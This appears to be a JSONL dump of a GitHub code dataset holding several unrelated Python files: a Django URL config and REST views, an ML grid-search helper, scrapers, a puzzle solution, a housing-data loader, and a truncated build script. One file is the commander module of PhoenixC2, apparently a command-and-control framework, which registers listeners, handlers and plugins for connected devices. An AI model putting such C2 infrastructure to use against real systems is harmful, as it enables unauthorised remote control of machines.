"en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "views.ArticleList.as_view", "line_number": 7, "usage_type": "call"}, {"api_name": "views.ArticleList", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "views.ArticleList.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "views.ArticleList", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "views.ArticleDetail.as_view", "line_number": 10, "usage_type": "call"}, {"api_name": "views.ArticleDetail", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "views.ArticlePre.as_view", "line_number": 11, "usage_type": "call"}, {"api_name": "views.ArticlePre", "line_number": 11, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "views.CategoryList.as_view", "line_number": 13, "usage_type": "call"}, {"api_name": "views.CategoryList", "line_number": 13, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "views.CategoryList.as_view", "line_number": 15, "usage_type": "call"}, {"api_name": "views.CategoryList", "line_number": 15, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "views.AuthorList.as_view", "line_number": 16, "usage_type": "call"}, {"api_name": "views.AuthorList", "line_number": 16, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "views.AuthorList.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "views.AuthorList", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "22974304059", "text": "# Helper Class for Initilizing GridSearch\r\nfrom sklearn.model_selection import GridSearchCV\r\n\r\n\r\n# name of the columns of the data frame which captures all the data of all algorithms\r\nMLA_Name = 'MLA Name'\r\nMLA_Param = 'MLA Parameters'\r\nMLA_Train_Accuracy = 'MLA Train 
Accuracy'\r\nMLA_Validation_Accuracy = 'MLA Validation Accuracy'\r\nMLA_Validation_STD = 'MLA Validation Accuracy 3*STD'\r\nMLA_Test_Accuracy = 'MLA Test Accuracy'\r\nMLA_Time = 'MLA Time'\r\n\r\nclass EstimatorSelectionHelper:\r\n \"\"\"Class to train and evaluate and score differnt ML models.\r\n It also retuns important features , best parameters after ML model evaluation\r\n It also dumps to model to local file system so that it can be used for later use\r\n \"\"\"\r\n\r\n def __init__(self):\r\n\r\n self.models = {}\r\n self.params = {}\r\n self.grid_searches = {}\r\n self.best_params = {}\r\n self.feature_importance = {}\r\n self.FeatureImportanceAlgo = ['DecisionTreeClassifier','RandomForestClassifier','ExtraTreesClassifier','GradientBoostingClassifier']\r\n self.MLA = pd.DataFrame(columns = [MLA_Name, MLA_Param, MLA_Time, MLA_Train_Accuracy, MLA_Validation_Accuracy, MLA_Test_Accuracy])\r\n\r\n\r\n def score(self, X_test, Y_test):\r\n \"\"\"function scores all added ML models \"\"\"\r\n df = self.MLA\r\n for k in self.grid_searches:\r\n print(k)\r\n algo = self.grid_searches[k]\r\n df.loc[ df[MLA_Name]== k , MLA_Test_Accuracy] = algo.score(X_test, Y_test)\r\n return self.MLA\r\n\r\n def fit(self, X, y, cv=3, n_jobs=3, verbose=1, scoring=None, refit=True):\r\n \"\"\"function fits all added ML models \"\"\"\r\n if not set(self.models.keys()).issubset(set(self.params.keys())):\r\n missing_params = list(set(self.models.keys()) - set(self.params.keys()))\r\n raise ValueError(\"Some estimators are missing parameters: %s\" % missing_params)\r\n\r\n for key in self.models.keys():\r\n print(\"Running GridSearchCV for %s.\" % key)\r\n model = self.models[key]\r\n params = self.params[key]\r\n gs = GridSearchCV(model, params, cv=cv, n_jobs=n_jobs,\r\n verbose=verbose, scoring=scoring, refit=refit,\r\n return_train_score=True)\r\n gs.fit(X,y)\r\n self.grid_searches[key] = gs\r\n self.best_params[key] = str(gs.best_params_)\r\n if key in self.FeatureImportanceAlgo:\r\n self.feature_importance[key]= gs.best_estimator_ .feature_importances_\r\n\r\n\r\n # print (gs.best_params_.feature_importances_ )\r\n # try:\r\n # print(gs.best_params_.feature_importances_ )\r\n # self.feature_importance[key]= gs.best_params_.feature_importances_\r\n # except AttributeError:\r\n # pass\r\n\r\n def imp_features(self):\r\n \"\"\"function returns the important feature evaluated after different ML evaluation\"\"\"\r\n\r\n d = self.feature_importance\r\n impDF = pd.DataFrame([d.keys(), d.values()])\r\n return impDF\r\n\r\n def returnBestParamDF(self):\r\n \"\"\"function returns the best paramemtes evaluated after different ML evaluation\"\"\"\r\n d = self.best_params\r\n BestParamDF = pd.DataFrame.from_dict([d.keys(), d.values()]).T\r\n return BestParamDF\r\n\r\n def add_model_and_params(self, name, model, hyperparam):\r\n \"\"\"function adds ML model and its Parameter to the class for evaluation \"\"\"\r\n self.models[name] = model\r\n self.params[name] = hyperparam\r\n\r\n def fit_summary(self):\r\n \"\"\"function accumulates the scores of each ML model into a member Data Frame\"\"\"\r\n arr = []\r\n for k in self.grid_searches:\r\n dict= {}\r\n # print(k)\r\n algo = self.grid_searches[k]\r\n dict[MLA_Name] = k\r\n dict[MLA_Param] = str(algo.best_params_)\r\n dict[MLA_Time] = np.nanmean( algo.cv_results_['mean_fit_time'])\r\n dict[MLA_Train_Accuracy] = np.nanmean(algo.cv_results_['mean_train_score'])\r\n dict[MLA_Validation_Accuracy] = np.nanmean(algo.cv_results_['mean_test_score'], )\r\n dict[MLA_Test_Accuracy] = 
0\r\n arr.append(dict)\r\n\r\n self.MLA = pd.DataFrame(arr)\r\n return self.MLA\r\n\r\n def save_model_to_file(self, modelname, filename='model.mdl'):\r\n \"\"\" function saves the input ML model is saved as input file \"\"\"\r\n if modelname not in self.grid_searches.keys():\r\n print(\"Model doesn't not exist !! No file is saved\")\r\n return False\r\n with open(filename, \"wb\") as file:\r\n pickle.dump(self.grid_searches[modelname],file)\r\n print(\"Model {} saved into file {}\".format(modelname, filename))\r\n return True\r\n", "repo_name": "irfanc/TelcomProject", "sub_path": "src/Estimator.py", "file_name": "Estimator.py", "file_ext": "py", "file_size_in_byte": 4812, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "14149767216", "text": "from rest_framework import status\nfrom rest_framework.generics import CreateAPIView, RetrieveAPIView\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import AllowAny\nfrom rest.app.user.serializers import UserRegistrationSerializer\nfrom rest.app.user.serializers import UserLoginSerializer\nimport datetime as dt\nimport pytz\n\n\nclass UserRegistrationView(CreateAPIView):\n\n serializer_class = UserRegistrationSerializer\n permission_classes = (AllowAny,)\n\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n event_date = dt.datetime.now().replace(tzinfo=pytz.UTC)\n local_date = event_date.astimezone(pytz.timezone('Asia/Jakarta'))\n response = {\n 'success' : 'True',\n 'status code' : status.HTTP_200_OK,\n 'message': 'User registered successfully',\n 'result': serializer.data,\n 'created_at': local_date.strftime('%m/%d/%Y %H:%M:%S %Z')\n }\n status_code = status.HTTP_200_OK\n return Response(response, status=status_code)\n\n\nclass UserLoginView(RetrieveAPIView):\n\n permission_classes = (AllowAny,)\n serializer_class = UserLoginSerializer\n\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n response = {\n 'success' : 'True',\n 'status code' : status.HTTP_200_OK,\n 'message': 'User logged in successfully',\n 'token' : serializer.data['token'],\n }\n status_code = status.HTTP_200_OK\n\n return Response(response, status=status_code)\n", "repo_name": "brianestadimas/django-sigmatech", "sub_path": "rest/app/user/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1736, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.generics.CreateAPIView", "line_number": 11, "usage_type": "name"}, {"api_name": "rest.app.user.serializers.UserRegistrationSerializer", "line_number": 13, "usage_type": "name"}, {"api_name": "rest_framework.permissions.AllowAny", "line_number": 14, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 20, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pytz.UTC", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pytz.timezone", "line_number": 21, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 24, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 24, "usage_type": "name"}, 
{"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 29, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 29, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 30, "usage_type": "call"}, {"api_name": "rest_framework.generics.RetrieveAPIView", "line_number": 33, "usage_type": "name"}, {"api_name": "rest_framework.permissions.AllowAny", "line_number": 35, "usage_type": "name"}, {"api_name": "rest.app.user.serializers.UserLoginSerializer", "line_number": 36, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 43, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 43, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 47, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 47, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "18537746325", "text": "# 톱니바퀴 G5\nimport sys\nfrom collections import deque\n\ninput = sys.stdin.readline\n\n\ndef right(idx, d):\n # 더이상 오른쪽 이동 불가\n if idx > 4 or gear[idx - 1][2] == gear[idx][6]:\n return\n\n if gear[idx - 1][2] != gear[idx][6]: # 인접 톱니바퀴가 회전 가능하면\n right(idx + 1, -d) # 오른쪽 이동\n gear[idx].rotate(d) # 현재 톱니바퀴 회전\n\n\ndef left(idx, d):\n # 더이상 왼쪽 이동 불가\n if idx < 1 or gear[idx][2] == gear[idx + 1][6]:\n return\n\n if gear[idx][2] != gear[idx + 1][6]: # 인접 톱니바퀴가 회전 가능하면\n left(idx - 1, -d) # 왼쪽 이동\n gear[idx].rotate(d) # 현재 톱니바퀴 회전\n\n\ngear = {}\nfor i in range(1, 5):\n gear[i] = deque((map(int, input().strip()))) # rotate 함수를 이용하기 위해 deque 사용\n\nfor _ in range(int(input())):\n num, dir = map(int, input().split())\n\n right(num + 1, -dir)\n left(num - 1, -dir)\n gear[num].rotate(dir) # rotate()함수를 이용 (양수) -> 오른쪽 회전\n\nans = 0\nfor i in range(4):\n ans += gear[i + 1][0] * (2 ** i)\n\nprint(ans)\n", "repo_name": "kkm0406/AlgorithmBOJ", "sub_path": "구현/14891.py", "file_name": "14891.py", "file_ext": "py", "file_size_in_byte": 1139, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.stdin", "line_number": 5, "usage_type": "attribute"}, {"api_name": "collections.deque", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "34617366589", "text": "# Import dependencies\nfrom splinter import Browser\nfrom bs4 import BeautifulSoup\nimport pandas as pd \nimport datetime as dt\nfrom datetime import datetime\n\n# Set the executable path and initialize the chrome browser in splinter\nexecutable_path = {'executable_path': '/usr/local/bin/chromedriver'}\nbrowser = Browser('chrome', **executable_path)\n\n# Visit URL\nurl = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'\nbrowser.visit(url)\n\n#Get Cerberus Hemisphere image\n# Visit cerberus hemisphere site\nurl = 'https://astrogeology.usgs.gov/search/map/Mars/Viking/cerberus_enhanced'\nbrowser.visit(url)\n\n#delay for loading the page\nbrowser.is_element_present_by_css(\"ul.item_list li.slide\", wait_time=1)\n\n# Parse the resulting html with soup\nhtml = browser.html\nimg_soup = BeautifulSoup(html, 'html.parser')\n\n# Find and click the full image button\nfull_image_elem = browser.find_by_id('wide-image-toggle')\nfull_image_elem.click()\n\n# Find and save Cerberus Hemisphere image url\nimg_url_cerberus = img_soup.select_one('img.wide-image').get(\"src\")\nimg_url_cerberus\n\n# Find and save hemisphere title 
\ncerberus_title = img_soup.find(\"h2\", class_='title').get_text()\ncerberus_title\n\n#Get Schiaparelli Hemisphere image\n# Visit Schiaparelli Hemisphere site\nurl = 'https://astrogeology.usgs.gov/search/map/Mars/Viking/schiaparelli_enhanced'\nbrowser.visit(url)\n\n#delay for loading the page\nbrowser.is_element_present_by_css(\"ul.item_list li.slide\", wait_time=1)\n\n# Parse the resulting html with soup\nhtml = browser.html\nimg_soup = BeautifulSoup(html, 'html.parser')\n\n# Find and click the full image button\nfull_image_elem = browser.find_by_id('wide-image-toggle')\nfull_image_elem.click()\n\n# Find and save Schiaparelli Hemisphere image url\nimg_url_schiaparelli = img_soup.select_one('img.wide-image').get(\"src\")\nimg_url_schiaparelli\n\n# Find and save hemisphere title \nschiaparelli_title = img_soup.find(\"h2\", class_='title').get_text()\nschiaparelli_title\n\n#Get Syrtis Major Hemisphere image\n# Visit Syrtis Major Hemisphere site\nurl = 'https://astrogeology.usgs.gov/search/map/Mars/Viking/syrtis_major_enhanced'\nbrowser.visit(url)\n\n#delay for loading the page\nbrowser.is_element_present_by_css(\"ul.item_list li.slide\", wait_time=1)\n\n# Parse the resulting html with soup\nhtml = browser.html\nimg_soup = BeautifulSoup(html, 'html.parser')\n\n# Find and click the full image button\nfull_image_elem = browser.find_by_id('wide-image-toggle')\nfull_image_elem.click()\n\n# Find and save Syrtis Major image url\nimg_url_syrtismajor = img_soup.select_one('img.wide-image').get(\"src\")\nimg_url_syrtismajor\n\n# Find and save hemisphere title \nsyrtismajor_title = img_soup.find(\"h2\", class_='title').get_text()\nsyrtismajor_title\n\n#Get Valles Marineris Hemisphere image\n# Visit Valles Marineris Hemisphere site\nurl = 'https://astrogeology.usgs.gov/search/map/Mars/Viking/valles_marineris_enhanced'\nbrowser.visit(url)\n\n#delay for loading the page\nbrowser.is_element_present_by_css(\"ul.item_list li.slide\", wait_time=1)\n\n# Parse the resulting html with soup\nhtml = browser.html\nimg_soup = BeautifulSoup(html, 'html.parser')\n\n# Find and click the full image button\nfull_image_elem = browser.find_by_id('wide-image-toggle')\nfull_image_elem.click()\n\n# Find and save Valles Marineris image url\nimg_url_vallesmarineris = img_soup.select_one('img.wide-image').get(\"src\")\nimg_url_vallesmarineris\n\n# Find and save hemisphere title \nvallesmarineris_title = img_soup.find(\"h2\", class_='title').get_text()\nvallesmarineris_title", "repo_name": "HunterWelsch/Web-Scrapping-HTML-CSS", "sub_path": "Mars_Hemispheres.py", "file_name": "Mars_Hemispheres.py", "file_ext": "py", "file_size_in_byte": 3509, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "splinter.Browser", "line_number": 10, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 26, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 50, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 74, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 98, "usage_type": "call"}]} +{"seq_id": "12066060849", "text": "\"\"\"This is the C2 commander class which handles the devices & listeners\"\"\"\nfrom multiprocessing import Process\nfrom threading import Thread\nfrom typing import Optional, TYPE_CHECKING\nfrom flask import Flask\nfrom phoenixc2.server.kits.handler_base import BaseHandler\nfrom phoenixc2.server.kits.listener_base import BaseListener\nfrom 
phoenixc2.server.plugins.base import (\n BasePlugin,\n BlueprintPlugin,\n ExecutedPlugin,\n RoutePlugin,\n InjectedPlugin,\n PolyPlugin,\n ConnectionEventPlugin,\n)\nfrom phoenixc2.server.utils.web import FlaskThread\nfrom phoenixc2.server.utils.misc import Status\nfrom phoenixc2.server.utils.ui import log_connection, log\n\nif TYPE_CHECKING:\n from phoenixc2.server.database import DeviceModel\nINVALID_ID = \"Invalid ID\"\nHANDLER_DOES_NOT_EXIST = \"Handler doesn't exist\"\nLISTENER_DOES_NOT_EXIST = \"Listener doesn't exist\"\n\n\nclass Commander:\n \"\"\"This is the Commander is used as a registry for all devices and listeners\"\"\"\n\n def __init__(self):\n self.web_thread: FlaskThread\n self.web_server: Flask\n self.active_listeners: dict[int, BaseListener] = {}\n self.active_handlers: dict[int, BaseHandler] = {}\n self.active_plugins: dict[str, BasePlugin] = {}\n self.injection_plugins: dict[InjectedPlugin, str] = {} # plugin : output\n self.connection_event_plugins: list[tuple[ConnectionEventPlugin, dict]] = []\n\n def get_active_handler(self, handler_id: int) -> Optional[BaseHandler]:\n \"\"\"Get a handler by id\"\"\"\n try:\n return self.active_handlers[int(handler_id)]\n except ValueError as e:\n raise ValueError(INVALID_ID) from e\n except KeyError as e:\n raise KeyError(HANDLER_DOES_NOT_EXIST) from e\n\n def get_active_listener(self, listener_id: int) -> Optional[BaseListener]:\n \"\"\"Get a listener by id\"\"\"\n try:\n return self.active_listeners[int(listener_id)]\n except ValueError as e:\n raise ValueError(INVALID_ID) from e\n except KeyError:\n raise KeyError(LISTENER_DOES_NOT_EXIST) from None\n\n def add_active_listener(self, listener: BaseListener):\n \"\"\"Add a listener to the commander\"\"\"\n self.active_listeners[int(listener.id)] = listener\n\n def add_active_handler(self, handler: BaseHandler):\n \"\"\"Add a handler to the commander\"\"\"\n self.active_handlers[int(handler.id)] = handler\n\n def remove_active_listener(self, listener_id: int):\n \"\"\"Remove a listener from the commander\"\"\"\n try:\n self.active_listeners.pop(int(listener_id))\n except ValueError as e:\n raise ValueError(INVALID_ID) from e\n except KeyError as e:\n raise KeyError(LISTENER_DOES_NOT_EXIST) from e\n\n def remove_active_handler(self, handler_id: int):\n \"\"\"Remove a device from the commander by id\"\"\"\n try:\n self.active_handlers.pop(int(handler_id))\n except ValueError as e:\n raise ValueError(INVALID_ID) from e\n except KeyError as e:\n raise KeyError(HANDLER_DOES_NOT_EXIST) from e\n\n def load_plugin(self, plugin: BasePlugin, config: dict):\n \"\"\"Load a plugin\"\"\"\n if not plugin.check_dependencies():\n if (\n input(\n f\"Plugin {plugin.name} has missing dependencies.\"\n \"Would you like to install them? 
(y/n): \"\n ).lower()\n == \"y\"\n ):\n plugin.install_dependencies()\n else:\n raise ModuleNotFoundError(\n f\"Plugin {plugin.name} has missing dependencies\"\n )\n if plugin.name in self.active_plugins:\n raise KeyError(f\"Plugin {plugin.name} already loaded\")\n\n if issubclass(plugin, ExecutedPlugin):\n try:\n if plugin.execution_type == \"direct\":\n plugin.execute(self, config)\n elif plugin.execution_type == \"thread\":\n Thread(\n target=plugin.execute, args=(self, config), name=plugin.name\n ).start()\n elif plugin.execution_type == \"process\":\n Process(\n target=plugin.execute, args=(self, config), name=plugin.name\n ).start()\n else:\n raise ValueError(f\"Invalid execution type {plugin.execution_type}\")\n except Exception as e:\n raise Exception(f\"Failed to load plugin '{plugin.name}'\") from e\n\n elif issubclass(plugin, BlueprintPlugin):\n self.web_server.register_blueprint(plugin.execute(self, config))\n\n elif issubclass(plugin, RoutePlugin):\n self.web_server.add_url_rule(plugin.rule, plugin.name, plugin.execute)\n\n elif issubclass(plugin, InjectedPlugin):\n self.injection_plugins[plugin] = plugin.execute(self, config)\n\n elif issubclass(plugin, ConnectionEventPlugin):\n self.connection_event_plugins.append((plugin, config))\n\n elif issubclass(plugin, PolyPlugin):\n # Loads all plugins which are specified by the poly-plugin\n for sub_plugin in plugin.plugins:\n self.load_plugin(sub_plugin, config)\n\n else:\n plugin.execute(self, config)\n\n self.active_plugins[plugin.name] = plugin\n\n def new_connection(self, device: \"DeviceModel\", reconnect: bool = False):\n \"\"\"Called when a new device connects\"\"\"\n log_connection(device, reconnect)\n\n for plugin, config in self.connection_event_plugins:\n try:\n plugin.execute(device, config)\n except Exception as e:\n log(\n f\"Failed to execute connection event plugin {plugin.name}: {e}\",\n Status.Danger,\n )\n", "repo_name": "PhoenixC2/PhoenixC2", "sub_path": "phoenixc2/server/commander/commander.py", "file_name": "commander.py", "file_ext": "py", "file_size_in_byte": 5909, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 266, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.TYPE_CHECKING", "line_number": 21, "usage_type": "name"}, {"api_name": "phoenixc2.server.utils.web.FlaskThread", "line_number": 32, "usage_type": "name"}, {"api_name": "flask.Flask", "line_number": 33, "usage_type": "name"}, {"api_name": "phoenixc2.server.kits.listener_base.BaseListener", "line_number": 34, "usage_type": "name"}, {"api_name": "phoenixc2.server.kits.handler_base.BaseHandler", "line_number": 35, "usage_type": "name"}, {"api_name": "phoenixc2.server.plugins.base.BasePlugin", "line_number": 36, "usage_type": "name"}, {"api_name": "phoenixc2.server.plugins.base.InjectedPlugin", "line_number": 37, "usage_type": "name"}, {"api_name": "phoenixc2.server.plugins.base.ConnectionEventPlugin", "line_number": 38, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 40, "usage_type": "name"}, {"api_name": "phoenixc2.server.kits.handler_base.BaseHandler", "line_number": 40, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 49, "usage_type": "name"}, {"api_name": "phoenixc2.server.kits.listener_base.BaseListener", "line_number": 49, "usage_type": "name"}, {"api_name": "phoenixc2.server.kits.listener_base.BaseListener", "line_number": 58, "usage_type": "name"}, {"api_name": "phoenixc2.server.kits.handler_base.BaseHandler", "line_number": 62, "usage_type": "name"}, 
{"api_name": "phoenixc2.server.plugins.base.BasePlugin", "line_number": 84, "usage_type": "name"}, {"api_name": "phoenixc2.server.plugins.base.ExecutedPlugin", "line_number": 102, "usage_type": "argument"}, {"api_name": "threading.Thread", "line_number": 107, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 111, "usage_type": "call"}, {"api_name": "phoenixc2.server.plugins.base.BlueprintPlugin", "line_number": 119, "usage_type": "argument"}, {"api_name": "phoenixc2.server.plugins.base.RoutePlugin", "line_number": 122, "usage_type": "argument"}, {"api_name": "phoenixc2.server.plugins.base.InjectedPlugin", "line_number": 125, "usage_type": "argument"}, {"api_name": "phoenixc2.server.plugins.base.ConnectionEventPlugin", "line_number": 128, "usage_type": "argument"}, {"api_name": "phoenixc2.server.plugins.base.PolyPlugin", "line_number": 131, "usage_type": "argument"}, {"api_name": "phoenixc2.server.utils.ui.log_connection", "line_number": 143, "usage_type": "call"}, {"api_name": "phoenixc2.server.utils.ui.log", "line_number": 149, "usage_type": "call"}, {"api_name": "phoenixc2.server.utils.misc.Status.Danger", "line_number": 151, "usage_type": "attribute"}, {"api_name": "phoenixc2.server.utils.misc.Status", "line_number": 151, "usage_type": "name"}]} +{"seq_id": "33758807177", "text": "import os\nimport tarfile\nimport urllib.request\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import StratifiedShuffleSplit\n\n\ndef fetch_housing_data(housing_url, housing_path):\n try:\n os.makedirs(housing_path, exist_ok=True)\n tgz_path = os.path.join(housing_path, \"housing.tgz\")\n urllib.request.urlretrieve(housing_url, tgz_path)\n housing_tgz = tarfile.open(tgz_path)\n housing_tgz.extractall(path=housing_path)\n housing_tgz.close()\n return \"data fetched\"\n except Exception as e:\n return e\n\n\ndef split_housing_data(housing, housing_path):\n housing[\"income_cat\"] = pd.cut(housing[\"median_income\"], bins=[0.0, 1.5, 3.0, 4.5, 6.0, np.inf], labels=[1, 2, 3, 4, 5],)\n split = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=42)\n for train_index, test_index in split.split(housing, housing[\"income_cat\"]):\n strat_train_set = housing.loc[train_index]\n strat_test_set = housing.loc[test_index]\n\n strat_train_set.to_csv(os.path.join(housing_path, \"train.csv\"))\n strat_test_set.to_csv(os.path.join(housing_path, \"validation.csv\"))\n\n return (strat_train_set, strat_test_set)\n\n\ndef load_housing_data(housing_path):\n try:\n csv_path = os.path.join(housing_path)\n return pd.read_csv(csv_path)\n except Exception as e:\n return e\n", "repo_name": "RevanthAdiga/MLE-Training", "sub_path": "src/utils/fetch_load_data.py", "file_name": "fetch_load_data.py", "file_ext": "py", "file_size_in_byte": 1369, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.makedirs", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 14, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 14, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 14, "usage_type": "name"}, {"api_name": "tarfile.open", "line_number": 15, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.inf", 
"line_number": 24, "usage_type": "attribute"}, {"api_name": "sklearn.model_selection.StratifiedShuffleSplit", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "23377368193", "text": "\"\"\"\nshinyrates_scraper.py\n\nScraper to collect data from shinyrates.com.\n\"\"\"\n\nimport copy\nimport json\nimport time\nimport requests\n\nfrom datetime import datetime\nfrom pathlib import Path\nfrom typing import Any, Dict\nfrom loguru import logger\n\n\ndef write_to_file(data: Dict[Any, Any], last_updated: int) -> None:\n \"\"\"Write response data to an output file.\"\"\"\n\n outdir = Path(\"data\")\n if not outdir.exists():\n outdir.mkdir()\n\n with open(outdir.joinpath(f\"{last_updated}.json\"), \"w\") as f:\n json.dump(data, f, indent=4)\n logger.info(f\"Wrote data for {last_updated}\")\n\n\ndef stream_data():\n \"\"\"\n Gather data from shinyrates.com whenever it updates\n\n The website claims to update every minute, but that's clearly not the case based on\n observations; it had the same data from at least 9 AM - 9 PM. Sleep for 5\n minutes and then query every 5 minutes to see if we ever get different data.\n \"\"\"\n\n last_data = None\n while True:\n data = requests.get(\"https://shinyrates.com/data/rate\").json()\n\n if data == last_data:\n logger.debug(\"Still nothing\")\n time.sleep(300)\n continue\n\n write_to_file(data, datetime.now().strftime(\"%Y%m%d_%H%M%S\"))\n last_data = copy.deepcopy(data)\n logger.debug(\"Sleeping\")\n time.sleep(300)\n\n\nif __name__ == \"__main__\":\n stream_data()\n", "repo_name": "tuchandra/silph", "sub_path": "shinyrates_scraper.py", "file_name": "shinyrates_scraper.py", "file_ext": "py", "file_size_in_byte": 1382, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.Dict", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 18, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 21, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 26, "usage_type": "call"}, {"api_name": "loguru.logger.info", "line_number": 27, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 27, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 41, "usage_type": "call"}, {"api_name": "loguru.logger.debug", "line_number": 44, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 44, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 45, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 48, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 49, "usage_type": "call"}, {"api_name": "loguru.logger.debug", "line_number": 50, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 50, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "27308020484", "text": "#!/usr/bin/env python\n#coding=utf-8\n\nimport 
subprocess\nimport argparse\nimport tempfile\nimport sys\nimport re\n\nclass NotARule(Exception):\n pass\n\ndef parse_rule(line):\n regexpr = '#\\s+(.+)\\s+->\\s*(.+)'\n m = re.match(regexpr, line)\n if m:\n inputs, outputs = m.groups()\n inputs = re.findall('[^ ,]+', inputs)\n outputs = re.findall('[^ ,]+', outputs)\n return inputs, outputs\n else:\n raise NotARule('not a rule')\n\ndef make_if_statement(inputs, outputs):\n conditions = []\n filedefs = 'INPUTFILES=`echo {}`\\n'.format(\" \".join(inputs))\n filedefs += 'OUTPUTFILES=`echo {}`\\n'.format(\" \".join(outputs))\n inputs_exist = 'for file in $INPUTFILES; do [ ! -e \"$file\" ] && echo \"Input file $file does not exist\" >&2 && exit 1; done\\n'\n\n conditions = \"\"\"\n runblock=0\n for inp in $INPUTFILES\n do\n for out in $OUTPUTFILES\n do\n if [ \"$inp\" -nt \"$out\" ]\n then\n runblock=1\n fi\n done\n done\n \"\"\"\n if_stmt = 'if [ \"$runblock\" -eq 1 ]\\nthen\\n'\n\n return filedefs + inputs_exist + conditions + if_stmt\n\n\ndef run_shell():\n parser = argparse.ArgumentParser()\n parser.add_argument('script')\n args = parser.parse_args()\n\n generated_scripts = tempfile.NamedTemporaryFile(mode='w',\n delete=False)\n\n print(generated_scripts.name)\n open_statement = False\n with file(args.script) as fid:\n for line in fid:\n if line.startswith(\"#\"):\n try:\n inputs, outputs = 